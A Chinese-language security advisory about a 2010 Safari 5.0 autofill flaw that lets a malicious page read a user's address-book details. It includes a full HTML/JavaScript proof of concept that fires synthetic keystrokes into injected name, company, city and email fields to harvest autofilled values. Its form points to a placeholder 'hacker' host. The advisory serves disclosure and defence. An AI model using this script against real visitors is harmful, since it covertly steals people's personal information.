发布日期:2010-07-22
更新日期:2010-07-23
受影响系统:
Apple Safari 5.0
描述:
BUGTRAQID:
41884
Safari是苹果家族机器
操作系统中默认捆绑的WEB浏览器。
Safari浏览器中默认启用的自动填充功能可能会使用个人地址簿卡片中的信息,用户受骗访问了恶意网页就可能导致泄漏个人信息。
<*来源:Jeremiah Grossman
链接:
http://secunia.com/advisories/40664/
http://jeremiahgrossman.blogspot.com/2010/07/i-know-who-your-name-where-you-work-and.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<script>
var iNames = [
"name",
"company",
"city",
"state",
"country",
"email",
];
function start() {
var str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
var chars = str.split("");
var form = document.getElementById('mine');
var d = document.getElementById('data');
if (document.getElementById('iname')) {
form.removeChild(document.getElementById('iname'));
}
if (iNames.length > 0) {
var input = document.createElement('input');
input.type = "text";
input.name = iNames.shift();
input.id = "iname";
form.appendChild(input);
d.innerHTML += "<br><b>Searching</b> \"" + input.name + "\": ";
mine(input, chars);
}
}
function mine(input, charset) {
var d = document.getElementById('data');
var char = charset.shift();
var flag = 0;
var event = document.createEvent('TextEvent');
event.initTextEvent('textInput', true, true, null, char);
input.value = "";
input.selectionStart = 0;
input.selectionEnd = 0;
input.focus();
input.dispatchEvent(event);
setTimeout(function() {
if (input.value.length > 1) {
d.innerHTML += input.value + "<br>\n";
flag++;
}
if ((charset.length > 0) && (! flag)) {
mine(input, charset);
} else {
start();
}
}, 500);
}
</script>
<style>
body {
font-size: 26px;
}
input {
font-size: 28px;
opacity: 1.0;
}
</style>
</head>
<body>
<form action="
http://hacker/" id="mine">
<input type="button" onclick="start();" value="Start">
</form>
<div id="data"></div>
</body>
</html>
建议:
厂商补丁:
Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.apple.com/
